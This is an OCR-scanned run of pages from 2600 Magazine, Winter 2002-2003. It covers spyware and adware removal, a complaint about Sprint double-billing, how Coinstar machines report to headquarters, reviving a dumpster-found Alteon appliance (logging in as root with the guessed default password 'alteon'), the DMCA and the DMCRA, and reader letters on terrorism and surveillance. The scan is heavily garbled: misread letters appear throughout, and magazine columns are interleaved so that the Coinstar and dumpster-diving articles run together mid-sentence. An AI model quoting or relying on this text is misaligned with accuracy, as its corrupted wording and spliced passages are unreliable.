by 0A/3_ 3>3d_MU/VsLV
ha x or 260(1 @ ma ikity.com
This short article is far too small to encompass
this topic but hopefully it will focus more atten-
tion on the increasing problems of removing spy-
ware and adware. Any hacker running a Window s
operating system is going to come across some
spyware or adware at some point. Popular lile
sharing P2P software are typically one of the
most common areas where adware is installed*
An example of this would be Kazan P2P, which
by default installs cydoor (cydoor.com).
Spyware and adware are often hidden deep in
Lhe Software Licensing documents and Terms
And Conditions when you install the software*
This can result in such things as your day-to-day
activities being broadcast to strangers or annoy-
ing ads being projected in your face every few
minutes.
To make it more confusing adware isn't neces-
sarily spyware. Registered shareware without ads
may he spyware, and purchased out of-the-box
software may contain adware and may also he
spyware* In addition* software updates may
change a previously ad -free version into an ad-
ware product. All this means that users need lo he
on guard w hen installing any type of software.
While legitimate adware companies veil] dis-
close the nature of data that is collected and trans-
mitted in their privacy statement, there is almost
no way for Lhe user to actually control what data
is being sent. The fact is thaL (he technology is in
theory capable of sending much more than just
banner statistics - and this is why people (espe-
cially computer hackers) should feel uncomfort-
able with lhe idea.
To top it off* if you have a slow computer or
Internet connection the resource hogging adware
or spyware can cause system and browser insta-
bility and slowness, as well as slow Internet
connectivity even more.
How Do You Protect Yourself?
] . Read the terms and conditions of the license
carefully before pressing "accept.ā
2. Run a spyware or adware removal software
tool, i here are many free versions available.
3. Avoid spyware at all costs. Run a firewall
utility like Zone Alarm (zonelabs.com) that spec-
ifies which programs can access the Internet and
how. Pay attention to what is asking for permis-
sion to connect online.
Winter 2002-2003
to a hacker message hoard or to a hacking
website.
5* Avoid adware. If you're broke and can't buy
a clean shareware product, find uu ad -free, non-
spyi ng equivalent of the program you need. This
can be hard since many popular programs come
only with adware installed*
6. Learn to use a packet sniffer to identify
transmissions (hat sneak through your browser
and other trusted apps*
7. Get to know your registry really well espe-
cially the H K E Y _LOC A L_M A C H 1 N E\S O FT-
WARE* H KE Y_C LFRRENT_U SERVSoftware *
and for Win2k HKEY. IJSERS\ areas. If you no-
tice software installed that you are suspicious of*
check to make sure it's not spyware or adware*
8. Manage your startup programs carefully.
Check the registry or use 'āmsconlig" or a similar
startup manager or alternatively download and in-
stall a free task manager to check and kill running
sp y w are/adwar e .
9. And finally, you can also reverse engineer
die adware software and find a way to corrupi the
data being transmitted. Alternatively develop
your own program to transmit dummy data lo the
adware /spy ware host servers. If you do achieve
this* post ihe results to a hacker message board or
to a hacking website.
Some good ad removal programs are: Opl-out
{grc.com/optout.hlm) and Ad- Aware (lavasoft-
usaxom). Also, visit the following websites:
scumware.com, security.knlla.de. and spyware -
into.com.
In summary* spyware and adware are not ille-
gal types of software in any way. However there
is almost no way for (he user to actually control
what data is being sent. My guess is that a deliv-
ery system like the ones used by spyware and ad-
ware corporations would be the most efficient
way for governments to spy on the public. They
probably have already thought of using this sys-
tem so hackers hew are .
Sho u is to VISA _hu rg la rĀ»G reg_Ipp,
Jalaiudinjtumi, _SfR _B U _D_, Scrappy.
Page 22
Page 23
Page: 1
Billing Parted Ending; &Z3/02
Statement Date: Qi 24/02
Customer dumber
Summary of CAurgea
Here's our August
Sprint bill - a little
higher than usual, but
otherwise normal.
Submitted
To Your
Znritt Card
Total
Uhpdtd
Charges
Taxes anU
R&pul alary
tel Chary-e
Bainni:<i
Forward
AccDunl
djuAlmcnls
SPRINT
Charges
SPRINT
ā” isccurits
Your charges and credits at a glance
DESCRIPTION OF TRANSACTIONS
CREDITS CHARGES
S PRINT LDO PMT-KCN 7S7 365- 5000 PA
8 PRINT USAGE ROB TEL 9002307 170 K&
Well, here's a neat trick. They charged us twice! And from two different states. This
is what we get lor trusting them to do an automated credit card payment each month
Page; 1
Billing Period Ending- 3/2&
Slat(>Fne<n[ Odie; 9/24/Q2
Customer Number:
At least they caught their
mistake and have given
us o negative balance.
But why would they be
submitting another
charge to our credit card?
Summary at Charges
TaxĀ« aĀ«d
Regulatory
Si-danCc
Forward
Account
Adjust rrurnts
SPRINT
Chargee
Ret Charges
Your charges and credits at a glance
They charged us again! Even though we have a negative balance!
It's either incompetence or cunning,
Again, we still have the same
acgaiive balance. Apparently,
Sprint's policy is to credit any
negative balances on paper hut
not in reality. They get to hold
onto our money and at the same
time claim wc have a credit
wish them. When we finally
called them on it, they asked i!
we would like to have it
"applied 11 to our account. As if
there was a SING l .E advantage
Lo keeping it stuck here!
Billing Period Ending: 1 0/Ā£3.ā02
Slatement Date; 10/24/02
Customer Number;
Summary of Charges
Tote l
Unpaid
SPRINT
Charges
Balance
Forward
Account
Adjustments
mm
S.H
Taxes and
Regutstory
Rel. Ctunrges.
Submitted
To Your
Credit Card
W47
mm
TRAN
POST
REF.
DATE
DATE
NO.
0WD3
0MH
ZEGG
0&04
JAHP
TRAN
DATE
POST
DATE
REF
NO
DESCRIPTION OF TRANSACTIONS
CREDITS
āH
CHARGES
09/27
09/27
N14A
SPRINT USAGE ROB TEUHXKOdTtTO SB
35.0(1
Page 24
2600 Magazine
EXPOSING the Coinstar N etwork
by area_5 1 curved, such as in a U -slmpe or in l he shapelaf a
Located across the United States, and now in section of a torus, and defining a gap is provided
parts of the United Kingdom and Canada, Comstar w ith a wire winding for excitation and/or ^tec-
machines are situated in supermarkets everywhere. tion. The sensor can he Used for simultaneously
Large and green (in the US - blue in foreign mar- obtaining data relating to two or more parameters
kets), the machines accept unrolled, unsorted of a coin or other object, such as size and uttnduc-
change and spit out a voucher redeemable for cash tivity of the object. Two or more frequencies can
for a processing fee. While the concept is simple, be used to sense core and/or cladding properties.
Comstar has more to it than meets the eye As a Objects recognized as acceptable coins, using the
previous investor in the company and a frequent sensor data, are diverted by a controllable deflect-
user of i heir machines, I have learned a great deal ing door, to tubes for delivery to acceptable coin
about how they work. bins/'
The machine itself consists of a CRT monitor. Prior to entering the actual sorting mechanism,
receipt printer, two large plastic bins which hold (he coins are run through a process w hich sorts out
change, a mechanism for sorting change, a mo- any debris, including washers, paperclips, and
dem. and (surprisingly) a telephone. The machine anything else that might be in ajar of coins. These
is controlled by four large buttons, one green, one objects fall into a plastic tray above the soiling
red. and two gray (newer machines have slightly mechanism, and are not returned to the user,
different configurations). The user presses the The coins then fall into one of two hi ns: an all-
green button several limes to enter into the coin pennies bin (pennies make up much of Coin star's
processing mode, at which point they dump their business) and a bin for the rest of the coins. Jn ac-
change into a metal tray. The change fulls through tuality, the coins must be taken by armored car to
a small slot, where it drops down into the sorting another sorting facility where they must be sorted
mechanism. If too much is change is dropping into once again, as a treasury requirement,
the sorting mechanism, the slot closes temporarily When the process completes, a receipt is spit
lo allow the sorting mechanism to catch up. out of the receipt primer, with several security fea-
The sorting mechanism itself does not involve tures: (1) The Coinstar logo is displayed on the
the size or the weight of the coin, as ihis is ux> right and left side of the tape when held under ul-
$low a process and causes too many errors in the traviolct light; (2) On the rear of the receipt, there
identification of coins. Rattier a complicated is a small box with nothing in it. If a coin is rubbed
process involving electromagnetic identification is across the box. the Coinstar logo appears,
used. Coinstar currently holds U.5, Patent Number However, far more interesting than the actual
6,196,371 for the device and the abstract of the machine is the Coinstar network. Each machine
patent provides a good explanation of how it contains a modem and a phone. Each machine di-
works: als the Coinstar headquarters every night and
Coins, preferably after cleaning, e.g. using a downloads the day's usage statistics. These include
trommel, are singula ted by a coin pickup assembly the number of coins counted, what types of coins
configured to reduce jamming. A coin rail assists in were counted, the number of transactions, the av-
providing separation between coins as they travel erage dollar amount per transaction, and the reject
past a sensor. The sensor provides an oscillating percentage (used in determining if a machine is re-
electromagnetic field generated on a single sensing jeering an excessive amount of coins, which is
core. The oscillating electromagnetic field is com- cause for a technician to be sent out U> examine it),
posed of one or more frequency components. The A normal reject percentage is around one percent,
electromagnetic field interacts with a coin, and however slightly higher percentages may be siin-
these interactions are monitored and used to ela_s- ply due to people inserting all kinds of foreign
sify the coin according to its physical properties. matter into the machines.
All frequency components of the magnetic field In addition, the machine analyzes the last
are phase-locked to a common reference fre- week's worth of usage statistics, and estimates the
queney. The phase relationships between the van- day it will be full. An armored car will then be
ous frequencies are fixed. and the interaction of scheduled to empty the machine on that day, or
each frequency component with the coin can be possibly earlier. The machines also contain diag-
accurateiy determined without the need for com- nostic software that will automatically page a lech-
plicated electrical filters. In one embodiment, a ni dan if a problem occurs,
sensor having a core, preferably ferrite, which is Occasionally, Coinstar sends software updates
Page 25
Winter 2002-2003
to the machines to lix bugs, add features, and ad-
vertise promotions. These updates are also down-
loaded to the machines during this time period.
All of these statistics are stored on servers at
Coinstar's headquarters in Bellevue. Washington,
and many employees can access them over the net-
work through software loaded on their computers*
I received a tour of the headquarters several years
ago, and at the lime all the servers were running
NT 4*0.
1 did notice another interesting feature while at
Coinstar Headquarters. They had a row til ma-
chines. dating from the earliest machine through
their future models that had not yet been released.
Some machines were on and functioning, others
were off. However, one (a current model) dis-
played a "Press CTRL-ALT-DEL to logon mes-
sage. as commonly seen in Windows NT 3 and 4.
For this reason, I have a suspicion that the ma-
chines run some form of Windows in the back-
by phantasm
phantasm C? texibox.net
Among many of the Lhings I love to take purl
in* dumpster diving always has that small thrill
of actual treasure hunting. Sooner or later you
are bound to find a manual with enough infor-
mation to keep you reading for a lew days or
evert months. Other times you may get lucky
and find an old computer that has parts you can
use.
A few months ago, during my weekly dive
excursion, 1 happened to stumble upon quite a
treasure in my favorite dive spot. On top of the
dumpster sal a beautiful green system, just un-
der 18" wide* 24ā deep, and L7 inches tall* I
was quite excited about finding something aside
from the usual post -it note about where ihey
were going to eat. or the regular office memo to
pul cigarettes in the ashtray outside and not on
the sidewalk.
I dropped my umbrella, and after a few at-
tempts to gei to the top of the dumpster, 1 made
it and put it in my car. Unsure of what exactly it
was, I dug around a bit more for a manual or
something about it and found nothing.
Later that evening I got home and peeled it
apart, noting it was quite compact internally. In-
side were three PCI slots used by a Fiber Giga-
bit E thernet adapter and two CryptoSwift SSL
ground, or at least have the capability to Jo so
In addition, the machines contain a phone the
is I i [iked directly into the CoiiiStar network. If a
store employee needs to schedule maintenance,
check the next coin pickup, or do any number oi
other things* he just needs to open the machine (it
is locked with a key) and pick up the phone. Also,
when the machine is opened, a pin code must he
entered to obtain access to the diagnostic software,
statistics, and to change the options of the ma-
chine, This code is also needed to access the
phone. ] personally have not had the opportunity to
access this pan of the machine* mainly due to the
lock and the security cameras right next to it (how-
ever, the lock is the main obstacle).
For all its case of use. a lot of technology sits
behind the green plastic of a Coinstar machine,
much of which 1 still have yet to uncover.
cards. The CPU was an Intel Celeron 500, 64 M
RAM chip, and a 64M CF card as its drive.
Looking more into if, I noticed there was no
keyboard pun, or a video connector at all* so
getting into a console would be a slight
challenge.
Alter writing down part numbers, I put it
back together and did a few searches. It ap-
peared l had an Alteon iSD- 1 00 and off I was on
a search for technical documentation* Hooking
it up and attempting to power it on, I found the
power button was broken off* A pen lip was all !
needed, and the whir of the fans chimed through
the mom. Running a serial cable from its serial
port to my system. I tried to get a console that
way with no luck.
After a bit more reading. I discovered a need
for an Alteon WebS witch to access the system,
So it was time for a lot more research.
The board inside was I ah led Teknor Appli
com* Inc.* with a PC L 946-1 system board. B\
using a PCI Video Card, I was able to remove
(he Fiber card and replace it to get a video out
put of what was going on during boot. I
quite pleased to see the system was lull\
functional and hooting tine.
Ihe manual for the board showed the pu
outs for its connectors* which was a woud
help. 1 was able to find the keyboard intcihm
2600 Magazine
information in the manual (page 108 of the
PDF)* and set up to find a way to add my own.
With an old P-II board that got fried* 1 cut
out its PS/2 keyboard connecLor with some
snips, removed the excess solder from the pins*
and cleaned it up for a belter connection. 1 had
to figure out a way to set up the connector
around the way this case was set up. In the (rue
form of imprecision, 1 grabbed a nice length of
Cat5 cable (once again found dumpster diving)
and stripped the ends of the wires bare for a
connection. After some solder work we had the
wires connected to the PCI -964 board and ran
the Cat5 to the back of the system to another
hole provided for another serial port. The con-
nector was soldered on at the other end and
some electrical tape to guard ihe bare w ires and
pins from the ease.
Plugging up a keyboard, 1 started it up and
saw the damage that could be done. During the
BlO*S load* the keyboard Lights came on* and
Red Hat Linux began to boot. Staring at the Lo-
gin/Password prompt l was quite excited. Of
course 1 started with a quick basic guess for root
with the password alteon and there 1 sat at a
working console.
A quick browse around to see what was
there and 1 powered it down. 1 removed a crypto
card and popped in a 3Com NIC, rebooted,
brought up the interface* and turned on SSH. A
few changes to set it all up automatically for
me. another power down, removal of the video
card, and brought it back up, l now had a system
to play with at my desk for more comfort*
From there I got a bit more curious and
wanted to expand the system some more, I
added 256M of RAM, then attempted to add a
2()Gig HDD and a CDRQM. I didn't have much
luck with that, hut found out if I removed the
CF Card I could use the HDD on /dev/hde
where the CF used to he. After a bit more play-
ing. I got Linux installed on the 20 Gig drive on
/dev/hde and it was working fine as a home
server.
The system provided me with well over a
month of fun and learning* as well as some in-
teresting calls to Nortel trying to understand the
BIOS and restrictions set into it. Granted I did
not get much information - it was brought to my
attention that reselling it required removing and
adding a new BIOS chip which I am too lazy to
do.
The n i oral of this I ong wind ed arlic le ?
Dumpster diving can provide you with expen-
sive treasures and a long time of fun and
learning.
Thanks to 404 and Tyler for assistance on
systems running CompactFlash cards and the
rest of Textbox Networks for help on other areas
of learning the system.
Related Sites
Alteon Users Guide: http://wwwl42,nortelnet
works.com/bvdoc/Hlieon/isd_ssl/050 1 25 ,C.pd f
Te k nor A ppl i c o n i PC I - 946 - 1 H arc! ware G u ide :
h Li p : //w w w. kont run . com/lech l i b/ni an u al s/PC I -
946H_and_P3544QBX_manual.pdf
The Digital Millennium Copyright Act
(DMCA) and the Digital Media Consumers'
Rights Act (PMCRA) are at Lhe opposite ends
of the "copyright rights 1 ' axis, so to speak. Rep-
resentative Boucher and Doolittle's DMCRA
will amend the changes made by the DMCA to
prevent the corporate abuses of pow er that have
been possible under the DMCA*
I he DMCA was enacted in 1998 to take el -
led m the year 2000, The DMCA modified the
US. copyright statutes to provide protection for
1 n py righted digital material* Since 1790 Con-
gress has made modi lie at ions to the U.S. copy-
Winter 2002-2003
DMCRA
right statues to accommodate new material. The
DMCA is just the next step in the series of mod-
ifications to the copyright statutes* There were
other reasons for the DMCA's enactment* At the
1996 World Intellectual Property Organization
Diplomatic Conference, the U.S. adopted the
World Intellectual Property Organization treaty.
There was a perceived need to comply with that
treaty: the DMCA made that compliance but
added much more than was necessary. Copy-
right owners were rightly concerned that their
works would be pirated on ihe digital frontier.
Congress did not intend for the DMCA to be
abused as it is so today. The DMCA was en-
Page 26
Page 27
acted to dear the gray area of pirating copy-
righted digital works and lo ban the "black box"
type devices intended for that purpose. In prac-
tice it has worked to that end and beyond. The
new clauses and provisions to the copyright
statutes have been abused aggressively to stifle
and control many legitimate activities. The
DMCA added anti -circu invention measures to
the copyright statutes that forbid under penally
of law gaining access to a work by "circumvent-
ing a technological protection measure that
would otherwise effectively control access to a
copyrighted work'. Hie DMCA also prevents
the import, manufacture, or export of any
device that can circumvent that protection.
By doing this the DMCA gives copyright
holders complete control over their works, no
matter what the circumstances. Historically, the
U.S. copyright laws haven't given copyright
holders this total control. A major "safety" on
this type of control is Lhe fair use doctrine. Fair
use allows the end user to make copies of a
copyrighted work for personal use. educational
use, use in commentary, criticism, and parody
or any other solely socially beneficial use, A
work protected by the DMCA cannot he copied
by the end user without the express consent of
the copyright holder. This completely nullifies
the fair use doctrine and tilts the balance of
power dangerously tow ard the copyright hold-
ers. By the same means the DMCA lakes away
the rights of f irst Sale and Limited Time. First
Sale gives the end users the right to sell a copy
of a work over and over once it is made. Lim-
ited Time limits the lime that a copyright is in
effect. The copyright is granted for a limited
time and alter that Lime is up the work goes into
the public domain.
The power that copyright holders now have
over these rights is shown in their use of the
DMCA. Dimitry Sklyarov, a young Russian
Ph.D. at Moscow University, was invited to
speak at Defcon about some of his research. His
speech outlined Adobe's e-Book security and its
weaknesses. He and his company had devel-
oped a program that allowed the end user to
make copies of an Adobe e-Book, which was
completely legal in Russia but illegal under Lhe
DMCA. He was arrested. Not for copyright in-
fringement or for helping anyone else infringe
upon copyright, but solely for citing weak-
nesses in e-Book security. He was arrested be-
cause someone he never met might use what he
learned through his research to copy an e-Book
without the publisher's permission, Adobe used
the DMCA to punish Sklyarov for speaking out
about his research. After months of imprison
ment Sklyarov was linully released under an
agreement w ith the Department of Justice. Aftei
his release the DMCA continued to pro sect iu
his employer, ElcomSofl, under the criminal
provisions of the DMCA. ElcomSofl is based in
Russia w here there is no DMCA. The DMCA is
reaching across continents to stifle free speech
Prior Lo this, the Motion Picture Association
of America (MPA A) brought suit against 2600
Maga z in e fo r pu b I i sh i ng DeCS S on its we h s i te .
DeCSS is an open source application that al-
lows Linux users to play DVDs. DeCSS s pri-
mary use is a DVD player. It also has the ability
to change file formats from DVD to MPG
which is like playing a DVD and recording it to
a VHS tape (which is. again, legal under the fair
use doctrine). Because it can do this it has be-
come the target of the MPA A through the
DMCA, 2600 was not accused of being in-
volved in the development of this tool, nor was
it accused of having used the softw are for copy-
right infringement. The lawsuit was brought
upon 2600 simply for making the source code
available. Free speech was denied to 2600 when
they were enjoined from publishing the DeCSS
source code. 26(X) lost the case and lost the ap-
peal. Some good can be said to have come of
this though - it was decidedly the most public
display of the dangers of Lhe DMCA ycL The
case provided a wake-up call to the hacker com-
munity and gave the world a glimpse of what
corporations can do with the DMCA.
In September of 2000 the Secure Digital
Music Initiative (SDMI) issued a public chal-
lenge encouraging the hacker community to de-
feat new watermarking technologies the SDMI
hoped to use to thwart piracy. Professor Edward
Pel ten and his team of researchers from Prince-
ton. Rice, and Xerox took up the challenge and
succeeded in circumventing the watermark con-
trols on the music liles. When the team tried to
show their research at the 2001 Usenix confer
enee, the SDMI threatened Pel ten with the
DMCA. The threat w r as in the form of a letter
that was delivered to Felten and his team as well
as their employers. Sharing research such as
Fe! ten's is common practice in the computer sci-
ence held. It shows others' mistakes and can
only lead to better solutions. If Felten and his
team presented their research the original sect!
rily technology would of course be compro
raised. but many w f ould offer suggestions to
improve or replace the weak technology. Even
Page 28
2600 Magazine
after SDMI had given Felten and his team per-
mission to circumvent their watermarking tech-
nologies, they were still able to revoke the right
of free speech with the DMCA. Fe lien's team
brought suit against SDMI and subsequently
made a partial release of their research.
Prominent Dutch cryptographer Niels Fer-
guson recently discovered major flaws in a
commercial hi -definition video encryption sys-
tem. Ferguson rightly fears legal action under
the DMCA and has therefore declined to release
any of his work. He doesn't talk to his peers and
scientific colleagues for fear of his research
simply reaching the U.S, which he thinks could
be interpreted as a violation of the DMCA.
This ^hows the beginning of a horrible trend.
Scientists arc withholding research or simply
avoiding the U.S, out of fear. Scientific devel-
opment in the U.S. is being stifled for the bene-
fit of the corporation. Scientists now fear the
U.S. They fear the "Land of the Free' because
corporations arc given power over individual
rights.
The DMCRA will give that power and the
rights back, to Lite consumer. This bill will re-
store the historical balance between copyright
holders and I he end user, 11 this bill passes in the
next session, the rights that the DMCA
threatens will be restored.
It will reaffirm the fair use doctrine in the
digital world, making it legal to circumvent a
technological measure preventing access as
long as the circumvention falls within the
guidelines of the fair use doctrine. It adds ex-
emptions for scientific research which reestab-
lishes the Beta max standard. The Beta max
standard would, in the digital world, allow the
manufacture anti distribution of software or
hardware that can be used to circumvent tech-
nological protection measures as long as it has a
legitimate use. The reestablishment of the Beta-
max standard would put scientists at ease and
encourage scientific research to continue as it
always has in an open forum style without fear
of prosecution for discoveries. Security can
again be developed, unimpeded by the DMCA,
Proper labeling of "copy- protected CDs" will
also be ensured. This new breed of CDs. mar-
keted as regular CfX have been known to have
playback problems and have also crashed quite
a few computers with their aggressive
pro te ct i on me as u re s ,
This bill has already won the support of
many major public entities, l he supporters in-
clude: Intel Corporation. Phillips Consumer
Electronics North America, Sun Microsystems.
Verizon. Gateway Consumer Electronics Asso-
ciation, American Library Association, Associa-
tion of tile American Universities, Association
of Research Libraries, American Association of
Law Libraries, Medical Library Association,
Special Liberties Association, Digital Future
Coalition, Consumers Union, National Writers
Union, Home Recording Rights Coalition.
American Foundation for the Blind, and the
Electronic Frontier Foundation. Many of the
supporters are library or writer associations of
some kind. It can be inferred that the libraries
and writers may fear the DMCA as the means to
an end of an era. an era of free speech and fair
use.
The way is now clear - the publicās rights are
threatened and the DMCRA is their boon. Li-
braries and writers across the United Slates
gather under the DMCRA's flag. Without the
DMCRA organizations like the MPAA gain
more o! a foothold in our society. Organizations
like the Electronic Frontier Foundation have
long known the effects of the DMCA and the
power it grants to corporations. The MPA A s
actions have paid off, but not in their favor. The
average citizen has at least heard of the DMCA
and many have now joined the light against it.
When the DMCRA is enacted, the power will be
returned to the people.
Greetz: Kahian. Zim, Bill and Ducky . Save
Far 8 cape.
Winter 2002-2003
Page 29
Spreading News
Dear 2600:
Some renters may already know this, but sneake
majl.com is a service that allows one to generate dis-
posable email addresses that forward to your real
address. It provides a self documenting method of
tracking who sells your email address so that you can
confront those companies with proof that they sold
your address,
NoSpa tim
Dear 2600:
In 1 9; 2, you printed a letter from one "MW" who
was asking about how to send anonymous faxes. For a
small fee. this person could use an e-fax service such
as www.maxemail.com to send a fax anywhere the
user accesses the Internet, Using a good proxy server
or other anonymous access point would allow the user
to send an anonymous fax.
Along these lines, users wishing to receive anony-
mous faxes may find the free services of
www.fmxwave.com to be useful. They assign you a
unique phone number (no extensions!) and receive the
faxes for you. Upon receipt, the transmission is con-
verted to a .t if file and emailed to any email address of
your choosing. All numbers are issued from the 115
area code and the exchange varies but is usually local
to Reno, Nevada.
Keith
Dear 2600 :
This is regarding the fax from Direct Media
America on page 13 of 19:3. Looks like there's an on-
going investigation of Direct Media America hy the
Florida Attorney General.
scott
We certainly can ! say we're surprised.
Dear 2600:
Many people probably already know about this,
but www payphone-project.com/ is a website with the
phone numbers to thousands of payphones all around
the States.
Sfctrdonicus
Hopefully the kind that still take incoming calls.
Dear 2600:
l truly admire your magazine and how hard the
staff of 2600 works to show us the information which
the government and corporations try to control and
distort. You're a group that the government tries to
suppress like any group that stands against the system,
one that will be targeted by those in "control ' just to
protect their own interests. Soon I'll be starting a 2600
meeting here in Puerto Rico with technological
themes and political issues too, highly influenced by
your magazine. You people are an inspiration lor the
hacker community and I really appreciate youi
struggle <md years of dedication.
cyhernurd
We wouldn't have gotten anywhere without out
readers f support. They've made everythin# possible .
Terrorism Related Issues
Dear 2600:
Anyone else notice the eerie resemblance between
9/11 and its aftermath and Brain Damage's 2/9/91
broadcast?
Tresser
You A referring to an early radio broadcast on
our website that theorized on the possibility of some
kind of fit lure attack on U.S . soil as a result of the Gulf
War. Many people around the world had also consid-
ered that possibility* And when the attacks came, it
woke a lot more people up to the fact that our foreign
policy can come back to haunt us right here.
Dear 2600:
This letter probably won't be the only one you get
on John Mcssner, who has been getting a hit of atten-
tion on the news lately for 'hacking" aincda.com. an
Al-Qaida website. He didn't really "hack " anything
and it's just ano filer example of how loosely the term
is used. He just decided to give one of those domain
snatching services (snapnames.com) a try and got
lucky when the ow ners of alncda tried to switch name
servers. I'm writing because Mcssner is being made
out to be some kind of geek hero in the news. I don I
think he is. In fact, I think he's the exact opposite of
what computer enthusiasts want to be identified with.
First of all, he's a pom king (having started some re-
ally successful girl -next-door type site) which some
people might find to be cool or whatever. I think it s
just disgusting. Second of all, the only thing he did
was get lucky with that name snatching service, which
takes zero intelligence and only enough "skill 1 to fire
up Internet Explorer. I had my name snatched by one
of those things about a year ago and had to pay i
bucks to get it back Not cool at all - they should be il
legal. Regardless of whether it was a terrorist website
or not (actually it was just a pro- Islam site, hut ho
what's the difference after the Hth anyway?), those
types of services are just bull and exploiting them like
that is completely against what being a hacker iv
about. I'm all for fighting terrorism but this is just u
other example of someone taking il too far and the
media glorifying it. We've already got the DMC A and
Patriot Act to worry about - I don 1 want to have to
look over my shoulder for vigilante pom bosses il
want to gel ahold of my website because the) think
they are somehow fighting terrorism. It also should be
noted that alneda.com now links to a forum when
people discuss world issues such as terrorism Most n1
the talks there are one-sided as can be expected I'm
I
Page 30
2600 Magazine
those of you w ho care, I am a born and raised North
Carohman (just in case it sounded like 1 was someone
u ho didnāt have any investment in the issue of terror-
ism L Thanks to 2600 for continuing to fight the good
tight, i hope you guys agree with me on this, but if not
I'm sure you'll explain why.
jmu
This raises a number of interesting points . From
our understanding, the owners qfolneda.com simply
didn't renew their domain name in time and someone
else grabbed it. It's not quite the same thing as steal-
ing the domain; it's really just a contest to see who's
paying attention and. unless the name is part of a
trademark , there's not a lot that can be done about if.
It may seem unfair bat if a domain is expired, it no
longer belongs ft} anyone . What snapmtmes does is
interesting - they will keep this from happening to you
if you pay them and they will attempt to grab names
you pay them for the moment they expire. We see no
reason to outlaw this as they're not doing anything
wrong. Ultimately their service will become ineffec-
tive as more such companies pop up. If it can be
proven that they re accepting money firm i both the do-
main holder and the person who wants that same do-
main. that would qualify as a ripeffin our book. As for
what's currently on the site, it's a free speech issue.
From what we've seen, anyone is welcome to partici-
pate (run that they āre obligated to allow this). What
she person! s) behind it does for a living is really im-
material to this, as is identifying what state you hap-
pen to be from. Nobody's opinions are more or fens
valid because of their background or location. What
we can agree on is that this really doesn't have a
whole lot to do with hacking - it's simply about paying
attention.
Dear 2600:
\ know as do all of your other readers that you are
against even the so called white hat hacking even if
(he site being attacked is an enemy of the state. But I
would have to say that this is just the kind of thing that
w i c in the hacking community should be doing.
1 do agree with you however that the attacking and
redirecting of their funds is crossing the line. But
there's nothing wrong with gathering "inter on their
agents, their movements, their strength, etc., and pass-
ing it on to the appropriate channels so that appropri-
ate plans can be made, as well as the monitoring of
rheir electronic fund transfers as that will also give us
intel on what they are planning.
! would also have to say that we should support
those who like Jon Messner through legal means took
over ownership of a particular domain name. And
considering that he did legally purchase the aforemen-
tioned domain name when it was not being used (even
if it was just fora "split-second,'' it was fair game), he
did so in a fair and legal move.
Herman
As we said above, using an existing system to gain
an advantage isn 't the problem. But those who believe
they should act 05 judge, jury , and executioner are de-
buting themselves. How do you suppose you're going
to he able to track down "enemy agents" in the first
place? They don't exactly advertise their presence.
\nd if you're going to turn any rate in to the authorities
who espouses an objectionable point of view or runs a
controversial website, we're going to be facing
problems of an entire different nature.
Dear 2666: j I
In your response in 19:1 lo a letter about cracking
bank accounts ( "Tracking Terrorists ' \ you said, "11
you really want to help, the best thing you can do is be
observant and notice things that other people may not
notice. Then let people know what you see.ā It seems
to me that this goes against your opposition to the
TIPS program. The TIPS program is really nothing
more than a way to gather information that people had
no easy way of reporting before. But of course people
can't handle the fact that instead of having important
criminal activity rnlāo reported to thousands of differ-
ent sources, they want one contact point. There have
been anonymous tip lines for other things for a long
time. One that may help stop and solve crime doesn't
sound that threatening to me,
PLMN
There 3 a difference between being observant and
being an informant. We encourage the former mean-
ing we believe people should notice things and tell the
world what they see. Its kind of our theme. Encourag-
ing people to report any "suspicious activity" of their
neighbors (or total strangers) to the authorities is
about the most unhealthy thing our society needs at
this point.
Dear 2660:
So 1 was there waiting in line at the local FedEx
for my laptop to come back from being serviced. I
was behind three gentlemen of Middle Eastern nation-
ality, Two of them were at the counter talking to a lady
who worked there. I think they were trying to figure
out when a package was going to arrive at its desdna-
tion. Anyhow, while I was looking at my slip. I
glanced over at the very quiet third man who was sil-
ting in a chair in from of me. He hud a piece of paper
and a manila envelope in his hand. On the white piece
of paper he had written everywhere
"INS.DA.DOJ.DO?' 1 (1 couldn't make out the last
character). This was written everywhere, on both sides
too. Then he flipped his hand over and on the enve-
lope he had a bunch of words writ ten like a list or ad-
dress. The only words I could make out were
[something] Middle School. That's all i could get be-
fore he got up to leave with the other two men. I don't
think the envelope had been sent yet because die
stamps didn't appear to have heen crossed out yet by
the post office. There were big stamps on it with pic-
tures of a man w ith a hat on like Eddie Murphy wore
in The Golden Child. The first thing that came to mind
when I saw the characters on die letters were those
letters with the anthrax, I didn't get their license plate
lor further tracking but they were driving a late 80ās
silver Honda Accord. My second thought was why the
hell would an international terrorist just walk into a
building holding "evidence?" So what the hell do I
do? If I let it go and they kill someone, I am a bad per-
son. ff I call i he police and he turns out to be practic-
ing his English or he was jusi sending money to his
family. I am a bad person, l haven't judged yet, but
what would you do? 1 turned to you guys because
Winter 2002-2003
Rage 31
youāre probably the mosl neutral people I know, Any
input would be appreciated,
Lectoid
This may be the first time we've ever been called
neutral. It's important in a rose like this to take fj step
back and look at the conclusions you've already
reached. People of Middle Eastern descent are con-
sidered suspicious by default. Would you have given
the same amount of scrutiny to someone who looked
more like you? This guy being quiet also made you
suspect something. Hut what's so unusual about some-
one being quiet while they watt in a chair for some-
one? As for the letters he was scribbling, are we really
to believe that such a thing is a suspicious activity?
Even if he was writing down the name of every 1 gov-
ernment agency he knew, so what ? Having the wools
"Middle School" on an envelope really isn't that
unusual either.
We re not faulting you for having this thought
process. What we're doing is asking van to examine it
and try and understand why these simple ait ions
could somehow plant the seeds of suspicion in your
mind . Then imagine the entire country thinking along
the same line.
The fact is you will not know if someone is up to
something evil unless you know them very well or are
highly trained in spotting such activity , Their are a
few lucky exceptions to this but they tend to involve
rather large dues , none of which were apparent here.
You can rest assured that y ou didn 't do anything to
make you a bad person.
Dear 2600:
So why ooi pul the army of 2600 to good use?
Have you seen sites like www.jehad.net? They bla-
tantly advocate the killing of American civilians and
praise the September 1 1 th attacks as acts of God. Why
not point the readership to a couple of these websites
and let thorn practice their skills?
Surf gods
Skills? You mean like getting Linux to run prop-
erly or installing secure encryption ? Or perhaps by
skills you mean something destructive which is appar-
ently when you think the hinder world exists for. You
have to realize that the Internet represents the entire
world, not just the United States. And that means all
kinds of philosophies - some of which may seem ab-
horrent - are represented Destruction isn V the answer
- you have an opportunity to see something firsthand
and accept or reject it fat your own reasons - as an in-
dividual You don h need some group acting on your
be hid for telling you what to think. How would it be if
in real life a group of fellow citizens went around de-
stroying people because they didn't like what they
were saying about us or because of major differences
in philosophy?
OK. that was a real bad example....
Dear 2600:
We must never forget dial die attacks of Septem-
ber 1 1th were above all else an attack on the American
